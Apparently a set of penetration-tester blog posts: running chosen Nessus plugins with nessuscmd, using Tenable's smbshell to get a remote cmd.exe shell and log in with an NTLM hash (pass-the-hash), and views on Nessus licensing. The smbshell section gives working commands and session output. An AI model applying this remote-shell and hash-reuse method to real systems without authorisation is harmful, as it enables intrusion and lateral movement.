nessuscmd for scanning a host with a subset of plugins

Need to check a few specifc nessus plugins against a host?

$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107

Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...

Host 192.168.1.92 is up

Discovered open port http (80/tcp) on 192.168.1.92

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

Version : 12.0.0.6327
URL : http://192.168.1.92/

looks like the functionality has been there for awhile:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html

Passing the Hash and other fun with Tenable smbshell

Description

smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :

• Navigate thru the remote SMB shares and download files or obtain their version number
• Read/Enumerate the remote SMB registry
• Query/Start/Stop/Pause remote services
• Obtain an interactive shell (cmd.exe) on the remote host

http://cgi.tenablesecurity.com/tenable/smbshell.php

Installation

smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility :

$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin

Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do :

C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin

Usage

cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit

smbshell>

oh and shell, shell is fun

shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>
C:\WINDOWS\system32>exit

[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html

###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...

If you have no idea what nasl is
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html

Thanks to MC for bringing this up to me.

Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.

Changes to Nessus License Model

Nessus has changed their license model to essentially do away with the free version for anyone who scans networks (yeah yeah there are exceptions). I wont get into the greedy or not, like Martin McKeay said "Tenable made a business decision that they need to collect revenue on their plugin feeds in order to continue providing the level of support they have always given. Some people are going to complain that Tenable is getting greedy; I’d counter that they just want to get paid for the work they’ve been supplying to the community for years."

For the most part i agree with that, and what is a smart decision by Tenable to look around and see that other VA scanners that are comparable cost more so they "might as well" charge too. But i do have to admit that since there is no good tool that "does it all" it is getting mighty annoying to pay for multiple tools to get a job done.

A new fully open source VA scanner like nessus used to be is a long time coming, but i don't think anyone will step up to bat. The only reason to do it would be to make money and why go up against nessus?

But if anyone IS taking requests... a VA scanner that i can select specific checks without running all the crap that runs for nessus would be nice or checks that require all the nessus libraries. a little command line jobby that you throw it an iprange and a check and it does the rest would be more than handy.

**update

pentestmonkey pointed me to OpenVAS...thanks!